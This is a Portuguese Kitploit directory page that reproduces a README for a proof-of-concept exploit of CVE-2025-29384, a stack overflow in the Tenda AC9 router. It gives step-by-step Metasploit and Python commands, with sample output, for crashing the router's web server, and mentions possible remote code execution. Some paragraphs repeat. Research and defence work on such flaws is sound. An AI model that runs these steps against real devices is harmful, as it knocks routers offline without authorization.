Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2025-29384 — POC for CVE-2025-29384 | Kitploit
Ferramentas/GitHubGitHub/fomovet/cve-2025-29384
Embedded Systems SecurityExploit FrameworksIoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingHardware & IoT SecurityLearning & EducationRed TeamingBinary Exploitation
há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
fomovet/cve-2025-29384

cve-2025-29384

POC for CVE-2025-29384

Ver Repositório

Exploit de Prova de Conceito CVE-2025-29384

Visão Geral

Este repositório contém um exploit de prova de conceito (PoC) avançado para o CVE-2025-29384, uma vulnerabilidade crítica de estouro de buffer baseado em pilha descoberta no roteador Tenda AC9 executando a versão de firmware V15.03.05.14_multi. Esta vulnerabilidade permite que atacantes remotos não autenticados travem o servidor web do roteador (Negação de Serviço, DoS) e potencialmente executem código arbitrário (Execução Remota de Código, RCE).

O objetivo deste projeto é demonstrar habilidades de desenvolvimento de exploits, contribuir para a comunidade de segurança cibernética e fornecer uma demonstração educacional para avaliações acadêmicas (por exemplo, bolsas de estudo em segurança cibernética). Este repositório contém um exploit de prova de conceito (PoC) avançado para o CVE-2025-29384, uma vulnerabilidade crítica de estouro de buffer baseado em pilha descoberta no roteador Tenda AC9 executando a versão de firmware V15.03.05.14_multi. Esta vulnerabilidade permite que atacantes remotos não autenticados travem o servidor web do roteador (Negação de Serviço, DoS) e potencialmente executem código arbitrário (Execução Remota de Código, RCE).

O objetivo deste projeto é demonstrar habilidades de desenvolvimento de exploits, contribuir para a comunidade de segurança cibernética e fornecer uma demonstração educacional para avaliações acadêmicas, como bolsas de estudo em segurança cibernética.

Detalhes da Vulnerabilidade

Descrição do CVE

O CVE-2025-29384 afeta a interface de gerenciamento web do roteador Tenda AC9, especificamente o endpoint:

root@kitploit:~
/goform/AdvSetMacMtuWan

A vulnerabilidade existe devido a verificação de limites inadequada no parâmetro wanMTU, que é processado através de uma requisição HTTP POST. A entrada é copiada para um buffer de pilha de tamanho fixo sem validação, levando a um clássico estouro de buffer baseado em pilha.

Impacto

  • Negação de Serviço (DoS): Trava o servidor HTTP do roteador, tornando-o não responsivo até uma reinicialização.
  • RCE Potencial: Um atacante poderia sobrescrever o endereço de retorno e executar código arbitrário na arquitetura baseada em MIPS do roteador.
  • Nenhuma Autenticação Necessária: A vulnerabilidade pode ser acionada remotamente sem credenciais, aumentando sua gravidade.

Análise Técnica

A função vulnerável (reconstrução hipotética) segue esta estrutura:

root@kitploit:~
void process_mtu(char *input) {
    char buffer[256];  // Fixed-size stack buffer
    strcpy(buffer, input);  // No length check, causes overflow
    // Process MTU value...
}

Um atacante que envia um payload excessivamente grande (por exemplo, 1024+ bytes) sobrescreve a memória adjacente, incluindo o endereço de retorno da função, potencialmente levando à execução de código.

Pontuação CVSS v3.1: 9.8 (Crítico)

Dispositivo Afetado

O Tenda AC9 é um roteador sem fio de banda dupla com as seguintes especificações:

  • CPU: Broadcom BCM4708 (MIPS 74Kc, dual-core, ~1 GHz)
  • RAM: 128 MB
  • Flash: 16 MB
  • Wi-Fi: Banda dupla 802.11ac (AC1200)
  • Portas: 1x Gigabit WAN, 4x Gigabit LAN
  • Firmware: V15.03.05.14_multi (confirmadamente vulnerável)

Linha do Tempo de Divulgação

  • 14 de Março de 2025 – CVE-2025-29384 publicado no NVD/MITRE.
  • 17 de Março de 2025 – Este PoC desenvolvido e testado.
  • 17 de Março de 2025 – Nenhum patch oficial da Tenda até esta data.

Detalhes do Exploit PoC

Módulo Ruby Metasploit

Este repositório também inclui um módulo Metasploit baseado em Ruby para o CVE-2025-29384. O módulo integra-se perfeitamente ao Metasploit Framework, permitindo explorar a vulnerabilidade usando msfconsole.

Como Usar o Módulo Ruby

Passo 1: Baixar o Módulo

root@kitploit:~
git clone https://github.com/Otsmane-Ahmed/cve-2025-29384-poc
cd cve-2025-29384-poc

Passo 2: Copiar o Módulo para o Metasploit

Localize o arquivo do módulo Ruby e copie-o para o diretório de exploits do Metasploit:

root@kitploit:~
cp tenda_ac9_stack_overflow.rb ~/.msf4/modules/exploits/linux/http/

Nota: Se o diretório não existir, crie-o:

root@kitploit:~
mkdir -p ~/.msf4/modules/exploits/linux/http/

Passo 3: Iniciar o Metasploit

Inicie o Metasploit Framework:

root@kitploit:~
msfconsole

Carregue o módulo:

root@kitploit:~
use exploit/linux/http/tenda_ac9_stack_overflow

Passo 4: Configurar e Executar o Exploit

Defina o endereço IP alvo:

root@kitploit:~
set RHOSTS <target_ip>

Defina o tamanho do payload (opcional, padrão é 1024):

root@kitploit:~
set PAYLOAD_SIZE 2048

Execute o exploit:

root@kitploit:~
run

Exemplo de Saída

root@kitploit:~
[*] Targeting Tenda AC9 at 192.168.0.1:80...
[*] Sending payload of size 2048...
[+] Payload sent successfully!
[*] Response: HTTP/1.1 200 OK...

Resultados Esperados

Sucesso: O servidor web do roteador trava, causando uma condição de Negação de Serviço (DoS).
Falha: O roteador permanece operacional, indicando que pode não ser vulnerável ou está executando uma versão de firmware corrigida.

Visão Geral do Exploit

Este PoC é um exploit baseado em Python que envia entrada oversized para /goform/AdvSetMacMtuWan, acionando um estouro de buffer para travar o servidor web e demonstrando o potencial para RCE.

Ambiente Testado

  • Sistema Operacional: Kali Linux
  • Versão do Python: 3.x
  • Dispositivo Testado: Tenda AC9 (Firmware V15.03.05.14_multi)

Funcionalidades

Multithreading – Lança múltiplas tentativas de exploit concorrentes para maior confiabilidade.

Payloads Dinâmicos – Gera strings de ataque aleatórias codificadas em base64.

Registro de Log – Usa o módulo de logging do Python para depuração estruturada.

Parâmetros Personalizáveis – Ajusta o IP alvo, tamanho do payload e número de threads.

Visão Geral do Exploit

Este PoC é um exploit baseado em Python que envia entrada oversized para /goform/AdvSetMacMtuWan, acionando um estouro de buffer para travar o servidor web.

Uso

Pré-requisitos

  • Python 3.x
  • Roteador Tenda AC9 com firmware V15.03.05.14_multi

Executando o Exploit

root@kitploit:~
python poc.py --target <router_ip> --size 2048 --threads 10
Argumentos:
ArgumentoDescrição
--targetIP do roteador (padrão: )

Exemplo de Saída

root@kitploit:~
[+] CVE-2025-29384 Exploit Engine
[INFO] Target: 192.168.0.1
[INFO] Sending payload (2048 bytes)...
[WARNING] Target timeout - possible crash!
[INFO] Exploit sequence completed.

Resultados Esperados

Sucesso: A interface web do roteador fica não responsiva (condição de DoS).

Falha: O roteador ainda responde (não vulnerável ou firmware incorreto).

Verificação

Para confirmar que o exploit travou o roteador com sucesso, tente recarregar a interface web. Se ela ficar não responsiva, o ataque foi bem-sucedido. Para uma análise mais aprofundada, verifique os logs de rede em busca de conexões perdidas ou use ping para verificar a capacidade de resposta do dispositivo.

Aviso Legal

Este projeto é apenas para fins educacionais e de hacking ético. O uso não autorizado deste exploit é ilegal. O autor não é responsável pelo uso indevido ou danos causados por este código.

Desenvolvido com ❤️ por Otsmane Ahmed Este projeto é apenas para fins educacionais e de hacking ético. O uso não autorizado deste exploit é ilegal. O autor não é responsável pelo uso indevido ou danos causados por este código.

Licença

Este projeto é lançado sob a Licença MIT.

Baixar ferramenta
MétricaValor
Vetor de AtaqueRede
Complexidade do AtaqueBaixa
Privilégios NecessáriosNenhum
Interação do UsuárioNenhuma
Impacto na ConfidencialidadeAlto
Impacto na IntegridadeAlto
Impacto na DisponibilidadeAlto
192.168.0.1
--sizeTamanho do payload em bytes (padrão: 1024)
--threadsNúmero de threads simultâneas (padrão: 5)